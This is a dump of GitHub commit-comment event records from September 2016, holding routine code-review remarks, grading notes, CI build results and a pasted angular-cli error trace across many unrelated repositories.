{"id":"4529120160","type":"CommitCommentEvent","actor":{"login":"janvorli"},"repo":{"name":"dotnet/coreclr"},"payload":{"comment":{"id":18932088,"position":4,"line":6956,"path":"src/pal/inc/pal.h","commit_id":"70f9195b2927cd836c9527fce909c4e5a9c0426a","created_at":"2016-09-07T17:28:47Z","updated_at":"2016-09-07T17:28:47Z","body":"A nit - could you please move this line to the place where we have all the others like this? The block starts at line 5713."}},"created_at":"2016-09-07T17:28:47Z"}
{"id":"4529120341","type":"CommitCommentEvent","actor":{"login":"racodond"},"repo":{"name":"SonarQubeCommunity/sonar-css"},"payload":{"comment":{"id":18932089,"position":null,"line":null,"path":null,"commit_id":"58d3493abdb201c1fb6a82be2615cf1ce9ddf4dd","created_at":"2016-09-07T17:28:50Z","updated_at":"2016-09-07T17:28:50Z","body":"SonarSource didn't want to let me administrate the repo.See https://groups.google.com/d/msg/sonarqube/jgQblU2uPy4/fM8I-mdSAgAJ. So, I had to fork it.\r\n\r\n"}},"created_at":"2016-09-07T17:28:50Z"}
{"id":"4529120605","type":"CommitCommentEvent","actor":{"login":"clarajohana"},"repo":{"name":"bayuelo/camaleon"},"payload":{"comment":{"id":18932090,"position":null,"line":null,"path":null,"commit_id":"176a6ef418d27f5724bc3697ee8130cf5ddd873a","created_at":"2016-09-07T17:28:53Z","updated_at":"2016-09-07T17:28:53Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;r19ayJZB&#x2F;13-modulo-localizacion-interfaz-grafica\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Módulo Localización - Interfaz Grafica</a>"}},"created_at":"2016-09-07T17:28:53Z"}
{"id":"4529121390","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18932094,"position":null,"line":null,"path":null,"commit_id":"d317881da9b2e3ecbba86fa55dfd861c07fc9606","created_at":"2016-09-07T17:29:03Z","updated_at":"2016-09-07T17:29:03Z","body":"We need some testing of this under Windows. The Windows users are currently testing the CONSTEXPR branch, so piggy-back testing on it."}},"created_at":"2016-09-07T17:29:03Z"}
{"id":"4529123606","type":"CommitCommentEvent","actor":{"login":"aviral-92"},"repo":{"name":"aviral-92/customer-management-tool"},"payload":{"comment":{"id":18932097,"position":null,"line":null,"path":null,"commit_id":"c833adaba9ddac08e31b8ced50d37f28a1026d35","created_at":"2016-09-07T17:29:29Z","updated_at":"2016-09-07T17:29:29Z","body":"@rinkuvatscs , @jain-preeti , @Mahima-95 \r\n\r\nCustomer is also available for testing."}},"created_at":"2016-09-07T17:29:29Z"}
{"id":"4529124995","type":"CommitCommentEvent","actor":{"login":"adrian17"},"repo":{"name":"adrian17/Gallifreyan"},"payload":{"comment":{"id":18932101,"position":9,"line":38,"path":"gui.js","commit_id":"d82196b77278f53493c301f85ddfb3bd985922f1","created_at":"2016-09-07T17:29:46Z","updated_at":"2016-09-07T17:29:46Z","body":"I just noticed that this unicode somehow breaks on my VM, so I'll go back to `-`."}},"created_at":"2016-09-07T17:29:46Z"}
{"id":"4529126358","type":"CommitCommentEvent","actor":{"login":"petemoore"},"repo":{"name":"mozilla-releng/OpenCloudConfig"},"payload":{"comment":{"id":18932108,"position":null,"line":null,"path":null,"commit_id":"d1bca4232712cbf34266f578d0b23e2913ee8276","created_at":"2016-09-07T17:30:03Z","updated_at":"2016-09-07T17:30:03Z","body":"You monkey!!! 😜 "}},"created_at":"2016-09-07T17:30:03Z"}
{"id":"4529130040","type":"CommitCommentEvent","actor":{"login":"d00p"},"repo":{"name":"Froxlor/Froxlor"},"payload":{"comment":{"id":18932125,"position":null,"line":null,"path":null,"commit_id":"e4887362ec33d6ee191a0df27303ea74de05d54e","created_at":"2016-09-07T17:30:45Z","updated_at":"2016-09-07T17:30:45Z","body":"Great, will fix that as soon as i get my hands on a Laptop ;)\nAm 07.09.2016 7:17 nachm. schrieb Jan Erik Petersen <notifications@github.com>:Other than the bug I inline-commented on, this seems to work well. Thanks!\r\n\r\n—You are receiving this because you authored the thread.Reply to this email directly, view it on GitHub, or mute the thread."}},"created_at":"2016-09-07T17:30:45Z"}
{"id":"4529130561","type":"CommitCommentEvent","actor":{"login":"KOPTE3"},"repo":{"name":"Evfrosiniya/sample"},"payload":{"comment":{"id":18932127,"position":null,"line":null,"path":null,"commit_id":"947569c5c83cbbd267dca4d173d27ea5ee7faba1","created_at":"2016-09-07T17:30:51Z","updated_at":"2016-09-07T17:30:51Z","body":"Необязательно явно создавать объект типа String, можно просто писать\r\n`res.send(emailDb[req.body.email]);`\r\nи всё"}},"created_at":"2016-09-07T17:30:51Z"}
{"id":"4529130907","type":"CommitCommentEvent","actor":{"login":"xfxyjwf"},"repo":{"name":"xfxyjwf/protobuf"},"payload":{"comment":{"id":18932128,"position":null,"line":null,"path":null,"commit_id":"ed3ecd9693b6918630362727caf0bd3f1731cb03","created_at":"2016-09-07T17:30:56Z","updated_at":"2016-09-07T17:30:56Z","body":"For zero-copy in Java, see: https://github.com/google/protobuf/blob/master/java/core/src/main/java/com/google/protobuf/UnsafeByteOperations.java"}},"created_at":"2016-09-07T17:30:56Z"}
{"id":"4529134013","type":"CommitCommentEvent","actor":{"login":"KOPTE3"},"repo":{"name":"Evfrosiniya/sample"},"payload":{"comment":{"id":18932143,"position":17,"line":21,"path":"server.js","commit_id":"947569c5c83cbbd267dca4d173d27ea5ee7faba1","created_at":"2016-09-07T17:31:33Z","updated_at":"2016-09-07T17:31:33Z","body":"Необязательно явно создавать объект типа String, можно просто писать\r\n`res.send(emailDb[req.body.email]);`\r\nи всё"}},"created_at":"2016-09-07T17:31:33Z"}
{"id":"4529134921","type":"CommitCommentEvent","actor":{"login":"Rajneesh69"},"repo":{"name":"Rajneesh69/IoTHA_WeightMeasurement"},"payload":{"comment":{"id":18932144,"position":null,"line":null,"path":null,"commit_id":"1ed7e7f7ed86cc31d52e8c3047af30fee9093d54","created_at":"2016-09-07T17:31:44Z","updated_at":"2016-09-07T17:31:44Z","body":"First"}},"created_at":"2016-09-07T17:31:44Z"}
{"id":"4529137414","type":"CommitCommentEvent","actor":{"login":"tevistumulty"},"repo":{"name":"J-Suts/HistoryoftheCalculator"},"payload":{"comment":{"id":18932149,"position":null,"line":null,"path":null,"commit_id":"3cd970e90b87d1c89d1ccbcc622543c7f489daf2","created_at":"2016-09-07T17:32:14Z","updated_at":"2016-09-07T17:32:14Z","body":"It looks like you updated this after I graded it:\n\nhttps://github.com/J-Suts/HistoryoftheCalculator/commit/a296269a291ba7b059f5099e8d109d9733931b50\n\nI will adjust the points and update the rubric.\n\n\nOn Tue, Sep 6, 2016 at 2:15 PM, Jake <notifications@github.com> wrote:\n\n> Missed image tag. Two are in the code\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/J-Suts/HistoryoftheCalculator/commit/3cd970e90b87d1c89d1ccbcc622543c7f489daf2#commitcomment-18918864>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ATD2_gV527Auwh8CMsyzE_lpbaP630pdks5qndgFgaJpZM4J2SyY>\n> .\n>\n"}},"created_at":"2016-09-07T17:32:14Z"}
{"id":"4529137682","type":"CommitCommentEvent","actor":{"login":"whysthatso"},"repo":{"name":"untitledkingdom/mina-puma"},"payload":{"comment":{"id":18932150,"position":null,"line":null,"path":null,"commit_id":"7144e81e79762feecc20d1b593b4e54a1df79ed4","created_at":"2016-09-07T17:32:17Z","updated_at":"2016-09-07T17:32:17Z","body":"trying to figure out where puma_port gets set. could you point me there?"}},"created_at":"2016-09-07T17:32:17Z"}
{"id":"4529140199","type":"CommitCommentEvent","actor":{"login":"KOPTE3"},"repo":{"name":"Evfrosiniya/sample"},"payload":{"comment":{"id":18932155,"position":10,"line":14,"path":"server.js","commit_id":"947569c5c83cbbd267dca4d173d27ea5ee7faba1","created_at":"2016-09-07T17:32:46Z","updated_at":"2016-09-07T17:32:46Z","body":"можно проверять проще\r\n`if (emailDb[req.body.email])`"}},"created_at":"2016-09-07T17:32:46Z"}
{"id":"4529141793","type":"CommitCommentEvent","actor":{"login":"DrRamm"},"repo":{"name":"Bitti09/android_device_xiaomi_cancro"},"payload":{"comment":{"id":18932160,"position":null,"line":null,"path":null,"commit_id":"caa6f6c433c97ba8109f3b98770dde8540437ee5","created_at":"2016-09-07T17:33:05Z","updated_at":"2016-09-07T17:33:05Z","body":"for what? "}},"created_at":"2016-09-07T17:33:05Z"}
{"id":"4529145463","type":"CommitCommentEvent","actor":{"login":"olegik-orlov"},"repo":{"name":"StrelnikovVitaliy/Strelnikov"},"payload":{"comment":{"id":18932167,"position":2,"line":2,"path":"src/module02/homework/task2.java","commit_id":"1dd62d24601eb2c0601d411820c83d969e4a4293","created_at":"2016-09-07T17:33:46Z","updated_at":"2016-09-07T17:33:46Z","body":"\r\nНе соответстствует заданию! Нужно создать метод\r\nContinue with BANK example\r\n2.1 Write method which withdraw money from account and takes commision 5% of the transaction. Print OK + commision + balance after withdrawal. Print NO is withdrawal is not possible.\r\n\r\n\r\nExample\r\n\r\n\r\nInput\r\n\r\nbalance = 100\r\nwithdrawal = 10\r\n\r\nOutput\r\nOK 0.5 89.5\r\n\r\nInput\r\n\r\nbalance = 100\r\nwithdrawal = 99\r\n\r\nOutput\r\nNO\r\n\r\n"}},"created_at":"2016-09-07T17:33:46Z"}
{"id":"4529149069","type":"CommitCommentEvent","actor":{"login":"antialias"},"repo":{"name":"PeteJodo/fluxible-redux-dispatcher"},"payload":{"comment":{"id":18932176,"position":12,"line":12,"path":"package.json","commit_id":"6a9668a0117cb3a8baa63561da15e3987a890f0d","created_at":"2016-09-07T17:34:30Z","updated_at":"2016-09-07T17:34:30Z","body":"works for me.\r\n<img width=\"170\" alt=\"screen shot 2016-09-07 at 10 34 12 am\" src=\"https://cloud.githubusercontent.com/assets/447517/18322244/a79ab40c-74e6-11e6-88a9-ce6beebf7448.png\">\r\n"}},"created_at":"2016-09-07T17:34:30Z"}
{"id":"4529149148","type":"CommitCommentEvent","actor":{"login":"dickeyxxx"},"repo":{"name":"heroku/heroku"},"payload":{"comment":{"id":18932177,"position":5,"line":719,"path":"lib/heroku/client.rb","commit_id":"b16b69f4abf775047e66e152b49f6a11c2b8cfe1","created_at":"2016-09-07T17:34:31Z","updated_at":"2016-09-07T17:34:31Z","body":"much better"}},"created_at":"2016-09-07T17:34:31Z"}
{"id":"4529149621","type":"CommitCommentEvent","actor":{"login":"tevistumulty"},"repo":{"name":"J-Suts/HistoryoftheCalculator"},"payload":{"comment":{"id":18932180,"position":null,"line":null,"path":null,"commit_id":"2524c0c3eaa404ad16fae99b61e7c8431a99a949","created_at":"2016-09-07T17:34:37Z","updated_at":"2016-09-07T17:34:37Z","body":"Images were added on Friday, 9/2, after I originally graded this.  Rubric was revised to reflect this addition."}},"created_at":"2016-09-07T17:34:37Z"}
{"id":"4529149906","type":"CommitCommentEvent","actor":{"login":"antialias"},"repo":{"name":"PeteJodo/fluxible-redux-dispatcher"},"payload":{"comment":{"id":18932181,"position":12,"line":12,"path":"package.json","commit_id":"6a9668a0117cb3a8baa63561da15e3987a890f0d","created_at":"2016-09-07T17:34:40Z","updated_at":"2016-09-07T17:34:40Z","body":"(in chrome)"}},"created_at":"2016-09-07T17:34:40Z"}
{"id":"4529150106","type":"CommitCommentEvent","actor":{"login":"ip1981"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18932182,"position":28,"line":145,"path":"nixos/modules/system/activation/activation-script.nix","commit_id":"e7adde7abb7c24babbf0a0822b2724f525d12363","created_at":"2016-09-07T17:34:42Z","updated_at":"2016-09-07T17:34:42Z","body":"Ok, I was wrong :-)"}},"created_at":"2016-09-07T17:34:42Z"}
{"id":"4529151542","type":"CommitCommentEvent","actor":{"login":"tevistumulty"},"repo":{"name":"J-Suts/HistoryoftheCalculator"},"payload":{"comment":{"id":18932188,"position":null,"line":null,"path":null,"commit_id":"2524c0c3eaa404ad16fae99b61e7c8431a99a949","created_at":"2016-09-07T17:34:58Z","updated_at":"2016-09-07T17:34:58Z","body":"https://github.com/J-Suts/HistoryoftheCalculator/commit/a296269a291ba7b059f5099e8d109d9733931b50"}},"created_at":"2016-09-07T17:34:58Z"}
{"id":"4529151864","type":"CommitCommentEvent","actor":{"login":"flixr"},"repo":{"name":"AravisProject/aravis"},"payload":{"comment":{"id":18932190,"position":14,"line":1124,"path":"viewer/arvviewer.c","commit_id":"5b10fc12d741cf44f267216fae1d1ac4fc9c3aeb","created_at":"2016-09-07T17:35:02Z","updated_at":"2016-09-07T17:35:02Z","body":"Sorry, not really familiar with glib/gtk API...\r\nshould be fixed"}},"created_at":"2016-09-07T17:35:02Z"}
{"id":"4529152194","type":"CommitCommentEvent","actor":{"login":"KOPTE3"},"repo":{"name":"Evfrosiniya/sample"},"payload":{"comment":{"id":18932191,"position":7,"line":11,"path":"public/main.js","commit_id":"947569c5c83cbbd267dca4d173d27ea5ee7faba1","created_at":"2016-09-07T17:35:06Z","updated_at":"2016-09-07T17:35:06Z","body":"Попробуй сделать так, чтобы на странице выводилась надпись\r\n`Привет, username! Ты был здесь 2 раз(а)`\r\n\r\nэто не очень сложно ;)"}},"created_at":"2016-09-07T17:35:06Z"}
{"id":"4529153227","type":"CommitCommentEvent","actor":{"login":"antialias"},"repo":{"name":"PeteJodo/fluxible-redux-dispatcher"},"payload":{"comment":{"id":18932192,"position":12,"line":12,"path":"package.json","commit_id":"6a9668a0117cb3a8baa63561da15e3987a890f0d","created_at":"2016-09-07T17:35:17Z","updated_at":"2016-09-07T17:35:17Z","body":"(and safari)\r\n<img width=\"160\" alt=\"screen shot 2016-09-07 at 10 34 58 am\" src=\"https://cloud.githubusercontent.com/assets/447517/18322264/c3c806e8-74e6-11e6-9441-c28969307802.png\">\r\n"}},"created_at":"2016-09-07T17:35:17Z"}
{"id":"4529158629","type":"CommitCommentEvent","actor":{"login":"Kaffeine"},"repo":{"name":"TelepathyQt/telepathy-nonsense"},"payload":{"comment":{"id":18932205,"position":62,"line":62,"path":"debug.cc","commit_id":"ef1241fa9e4da18682fa18d537b5e5aef1cd19f5","created_at":"2016-09-07T17:36:21Z","updated_at":"2016-09-07T17:36:21Z","body":"This print is a fallback. Generally we return from this function ten lines above:\r\n```diff\r\n\r\n+    if (defaultHandler) {\r\n+        defaultHandler(type, context, msg);\r\n+        return;\r\n+    }\r\n```"}},"created_at":"2016-09-07T17:36:21Z"}
{"id":"4529163274","type":"CommitCommentEvent","actor":{"login":"dark"},"repo":{"name":"dark/gerrit-owners"},"payload":{"comment":{"id":18932219,"position":null,"line":null,"path":null,"commit_id":"6eb35336fe019d2d4997ca44dffb22475893ed3c","created_at":"2016-09-07T17:37:15Z","updated_at":"2016-09-07T17:37:15Z","body":"Hi @vishy16 ,\r\nunfortunately I don't have a Gerrit system at version 2.12.3 to test it out.\r\nI'm using Gerrit 2.10.7.\r\n\r\nYou might have more luck asking the original author of the patch (tellapart/gerrit-owners@08fcb1aa061fc74e79bba8c69c57871830aec3ea) or maybe upstream @ https://gerrit.googlesource.com/plugins/owners.\r\n"}},"created_at":"2016-09-07T17:37:15Z"}
{"id":"4529165437","type":"CommitCommentEvent","actor":{"login":"PeteJodo"},"repo":{"name":"PeteJodo/fluxible-redux-dispatcher"},"payload":{"comment":{"id":18932222,"position":12,"line":12,"path":"package.json","commit_id":"6a9668a0117cb3a8baa63561da15e3987a890f0d","created_at":"2016-09-07T17:37:41Z","updated_at":"2016-09-07T17:37:41Z","body":"okay going to push fixes"}},"created_at":"2016-09-07T17:37:41Z"}
{"id":"4529172740","type":"CommitCommentEvent","actor":{"login":"davids5"},"repo":{"name":"PX4/Firmware"},"payload":{"comment":{"id":18932241,"position":1,"line":1,"path":"cmake/configs/nuttx_crazyflie_default.cmake","commit_id":"1b4dabea9f018d406bea8d3453b2a0566c787ab1","created_at":"2016-09-07T17:39:00Z","updated_at":"2016-09-07T17:39:00Z","body":"@dennisss \r\nThank you for the link to the schematic.\r\n\r\nI see there is no SD card - Is there parameter storage and logging?\r\n Could the startup script merge have been bad and the lack of the SD card is leaving nsh running on ACM0?\r\n \r\nIs there a dedicated debug port? \r\n  Can you use nsh on that port to see if navlink is running on the /dev/ttyACM0?\r\nOr try to manually start start it.\r\n\r\n"}},"created_at":"2016-09-07T17:39:00Z"}
{"id":"4529173389","type":"CommitCommentEvent","actor":{"login":"zero323"},"repo":{"name":"awesome-spark/spark-gotchas"},"payload":{"comment":{"id":18932245,"position":null,"line":null,"path":null,"commit_id":"1556d9f0bf225048bc773294b8ee5e15ff826d86","created_at":"2016-09-07T17:39:09Z","updated_at":"2016-09-07T17:39:09Z","body":"@eliasah What do you think?"}},"created_at":"2016-09-07T17:39:09Z"}
{"id":"4529175605","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18932249,"position":null,"line":null,"path":null,"commit_id":"714e7e1170a3aa127c1d11fb21d1fc418aa97cbb","created_at":"2016-09-07T17:39:34Z","updated_at":"2016-09-07T17:39:34Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1759 of 1760 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-714e7e1170a3aa127c1d11fb21d1fc418aa97cbb-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-714e7e1170a3aa127c1d11fb21d1fc418aa97cbb-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.94%25-yellow.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-714e7e1170a3aa127c1d11fb21d1fc418aa97cbb-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-70.9%25-green.svg)</a>\n"}},"created_at":"2016-09-07T17:39:34Z"}
{"id":"4529179236","type":"CommitCommentEvent","actor":{"login":"manikantavoonna"},"repo":{"name":"manikantavoonna/manikantavoonna.github.io"},"payload":{"comment":{"id":18932264,"position":null,"line":null,"path":null,"commit_id":"865fa435c88e608e8f66ba928dd481a0822fea7f","created_at":"2016-09-07T17:40:15Z","updated_at":"2016-09-07T17:40:15Z","body":"ok"}},"created_at":"2016-09-07T17:40:15Z"}
{"id":"4529180475","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18932267,"position":null,"line":null,"path":null,"commit_id":"714e7e1170a3aa127c1d11fb21d1fc418aa97cbb","created_at":"2016-09-07T17:40:28Z","updated_at":"2016-09-07T17:40:28Z","body":"FixCentroidForNonconvex (JasonGlazer) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-714e7e1170a3aa127c1d11fb21d1fc418aa97cbb-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-07T17:40:28Z"}
{"id":"4529182852","type":"CommitCommentEvent","actor":{"login":"gnodet"},"repo":{"name":"jline/jline3"},"payload":{"comment":{"id":18932278,"position":null,"line":null,"path":null,"commit_id":"27c7827c47a6863180436bb12e57a9d4b52e6084","created_at":"2016-09-07T17:40:53Z","updated_at":"2016-09-07T17:40:53Z","body":"It does not do nothing, it raises the signal.  The user is responsible for catching and handling it appropriately.  And given ReadLineImpl handles the signal correctly, I'm not sure how to obtain a better behavior by default."}},"created_at":"2016-09-07T17:40:53Z"}
{"id":"4529187811","type":"CommitCommentEvent","actor":{"login":"Memphiz"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":18932291,"position":482,"line":665,"path":"xbmc/addons/AddonDatabase.cpp","commit_id":"8f7b6a25d42f719b959e94a25eb02aa600f3386c","created_at":"2016-09-07T17:41:51Z","updated_at":"2016-09-07T17:41:51Z","body":"Yeah maybe - i think people started complaining since the aug 24th atv4 testbuild i posted - the one before from 24th july was ok they stated. Wouldn't count on those information though. Who are the team devs with proper knowledge of this code part?"}},"created_at":"2016-09-07T17:41:51Z"}
{"id":"4529189272","type":"CommitCommentEvent","actor":{"login":"carnaval"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18932298,"position":null,"line":null,"path":null,"commit_id":"8db40db6092e37d04160d80a6cd281a888a30e69","created_at":"2016-09-07T17:42:09Z","updated_at":"2016-09-07T17:42:09Z","body":"@nanosoldier `runbenchmarks(ALL, vs = \"@2ab4a0d5aba0861f4f25d575192a22c95b12dec9\")`\r\nlet's see the extent of the disaster"}},"created_at":"2016-09-07T17:42:09Z"}
{"id":"4529191818","type":"CommitCommentEvent","actor":{"login":"Edher-Ivan"},"repo":{"name":"reicast/reicast-emulator"},"payload":{"comment":{"id":18932308,"position":null,"line":null,"path":null,"commit_id":"04137ca9501af8709a725d6d6728aeecbe368339","created_at":"2016-09-07T17:42:37Z","updated_at":"2016-09-07T17:42:37Z","body":"Works Resident Evil 2 ??"}},"created_at":"2016-09-07T17:42:37Z"}
{"id":"4529193049","type":"CommitCommentEvent","actor":{"login":"zardak"},"repo":{"name":"jinzhu/gorm"},"payload":{"comment":{"id":18932312,"position":9,"line":369,"path":"main.go","commit_id":"02f6ae3c4ed211472b0492cee02ff3ddfdc1830d","created_at":"2016-09-07T17:42:52Z","updated_at":"2016-09-07T17:42:52Z","body":"`FirstOrCreate` does the select https://github.com/jinzhu/gorm/blob/master/main.go#L323"}},"created_at":"2016-09-07T17:42:52Z"}
{"id":"4529199215","type":"CommitCommentEvent","actor":{"login":"gdbrown"},"repo":{"name":"gdbots/pbjx-bundle-php"},"payload":{"comment":{"id":18932327,"position":17,"line":17,"path":"src/Form/Type/CollectionType.php","commit_id":"1e3c653dc2f0c7dd0884eafe4cd18741b11ecf2b","created_at":"2016-09-07T17:44:07Z","updated_at":"2016-09-07T17:44:07Z","body":"@excelwebzone not sure this is really needed.  doesn't the getBlockPrefix already produce this value.  also the getName is not apart of the FormTypeInterface so it's not needed.  unless there's something else you're using this for?"}},"created_at":"2016-09-07T17:44:07Z"}
{"id":"4529199427","type":"CommitCommentEvent","actor":{"login":"chelseakomlo"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18932329,"position":140,"line":128,"path":"otrv4.md","commit_id":"4c94da9242a80ca74c7cc5aec78a58bdd734682c","created_at":"2016-09-07T17:44:10Z","updated_at":"2016-09-07T17:44:10Z","body":"Hey- is there better markdown notation for mathematical operations?"}},"created_at":"2016-09-07T17:44:10Z"}
{"id":"4529203187","type":"CommitCommentEvent","actor":{"login":"liugang585570"},"repo":{"name":"whjiaojiao/test"},"payload":{"comment":{"id":18932336,"position":null,"line":null,"path":null,"commit_id":"3cd7897d1b509c9235f246c81fc145a9fa5c1659","created_at":"2016-09-07T17:44:52Z","updated_at":"2016-09-07T17:44:52Z","body":"laj \r\n"}},"created_at":"2016-09-07T17:44:52Z"}
{"id":"4529203632","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaPy/PyCall.jl"},"payload":{"comment":{"id":18932337,"position":null,"line":null,"path":null,"commit_id":"869db2838fd0df0033fa6305d6ce72c9f65d5866","created_at":"2016-09-07T17:44:57Z","updated_at":"2016-09-07T17:44:57Z","body":"I think you need to re enable CI after this was moved."}},"created_at":"2016-09-07T17:44:57Z"}
{"id":"4529206558","type":"CommitCommentEvent","actor":{"login":"INSPIRE-REX"},"repo":{"name":"COND-ORG/android_device_motorola_msm8610-common"},"payload":{"comment":{"id":18932345,"position":2,"line":1,"path":"Android.mk","commit_id":"ce2855a5d69a35af69d5af44c15a35e34fdec5aa","created_at":"2016-09-07T17:45:35Z","updated_at":"2016-09-07T17:45:35Z","body":"whats is this? gave error"}},"created_at":"2016-09-07T17:45:35Z"}
{"id":"4529213254","type":"CommitCommentEvent","actor":{"login":"goowikns"},"repo":{"name":"angular/angular-cli"},"payload":{"comment":{"id":18932358,"position":null,"line":null,"path":null,"commit_id":"f286c1c798a1c9bbd46f8ea79282d3d2e76af30f","created_at":"2016-09-07T17:46:51Z","updated_at":"2016-09-07T17:46:51Z","body":"I recently updated the webpack as suggested by @JohannesHoppe \r\n\r\nusing: `npm i -g angular-cli@webpack`\r\n\r\nNow whenever I use: `ng new xxxx`\r\n\r\nI get following error:\r\n\r\n> Error while running script \"C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\addon\\ng2\\models\\config\\config.ts\":\r\n> SyntaxError: Unexpected token ...\r\n>     at exports.runInThisContext (vm.js:53:16)\r\n>     at Module._compile (module.js:373:25)\r\n>     at Object.require.extensions..ts (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\lib\\bootstrap-local.js:30:14)\r\n>     at Module.load (module.js:343:32)\r\n>     at Function.Module._load (module.js:300:12)\r\n>     at Function.Module._load (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\lib\\bootstrap-local.js:55:22)\r\n>     at Module.require (module.js:353:17)\r\n>     at require (internal/module.js:12:17)\r\n>     at Object.<anonymous> (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\addon\\ng2\\models\\config.ts:7:16)\r\n>     at Module._compile (module.js:409:26)\r\n> Error while running script \"C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\addon\\ng2\\models\\config.ts\":\r\n> SyntaxError: Unexpected token ...\r\n>     at exports.runInThisContext (vm.js:53:16)\r\n>     at Module._compile (module.js:373:25)\r\n>     at Object.require.extensions..ts (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\lib\\bootstrap-local.js:30:14)\r\n>     at Module.load (module.js:343:32)\r\n>     at Function.Module._load (module.js:300:12)\r\n>     at Function.Module._load (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\lib\\bootstrap-local.js:55:22)\r\n>     at Module.require (module.js:353:17)\r\n>     at require (internal/module.js:12:17)\r\n>     at Object.<anonymous> (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\addon\\ng2\\models\\config.ts:7:16)\r\n>     at Module._compile (module.js:409:26)\r\n> C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\addon\\ng2\\models\\config\\config.ts:23\r\n>         this._config = new (schema_class_factory_1.SchemaClassFactory(schema))(configJson, ...fallbacks);\r\n>                                                                                            ^^^\r\n> \r\n> SyntaxError: Unexpected token ...\r\n>     at exports.runInThisContext (vm.js:53:16)\r\n>     at Module._compile (module.js:373:25)\r\n>     at Object.require.extensions..ts (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\lib\\bootstrap-local.js:30:14)\r\n>     at Module.load (module.js:343:32)\r\n>     at Function.Module._load (module.js:300:12)\r\n>     at Function.Module._load (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\lib\\bootstrap-local.js:55:22)\r\n>     at Module.require (module.js:353:17)\r\n>     at require (internal/module.js:12:17)\r\n>     at Object.<anonymous> (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\addon\\ng2\\models\\config.ts:7:16)\r\n>     at Module._compile (module.js:409:26)\r\n> \r\n> D:\\Projects>ng new deckbuilder\r\n> Error while running script \"C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\addon\\ng2\\models\\config\\config.ts\":\r\n> SyntaxError: Unexpected token ...\r\n>     at exports.runInThisContext (vm.js:53:16)\r\n>     at Module._compile (module.js:373:25)\r\n>     at Object.require.extensions..ts (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\lib\\bootstrap-local.js:30:14)\r\n>     at Module.load (module.js:343:32)\r\n>     at Function.Module._load (module.js:300:12)\r\n>     at Function.Module._load (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\lib\\bootstrap-local.js:55:22)\r\n>     at Module.require (module.js:353:17)\r\n>     at require (internal/module.js:12:17)\r\n>     at Object.<anonymous> (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\addon\\ng2\\models\\config.ts:7:16)\r\n>     at Module._compile (module.js:409:26)\r\n> Error while running script \"C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\addon\\ng2\\models\\config.ts\":\r\n> SyntaxError: Unexpected token ...\r\n>     at exports.runInThisContext (vm.js:53:16)\r\n>     at Module._compile (module.js:373:25)\r\n>     at Object.require.extensions..ts (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\lib\\bootstrap-local.js:30:14)\r\n>     at Module.load (module.js:343:32)\r\n>     at Function.Module._load (module.js:300:12)\r\n>     at Function.Module._load (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\lib\\bootstrap-local.js:55:22)\r\n>     at Module.require (module.js:353:17)\r\n>     at require (internal/module.js:12:17)\r\n>     at Object.<anonymous> (C:\\Users\\goowi\\AppData\\Roaming\\npm\\node_modules\\angular-cli\\addon\\ng2\\models\\config.ts:7:16)\r\n>     at 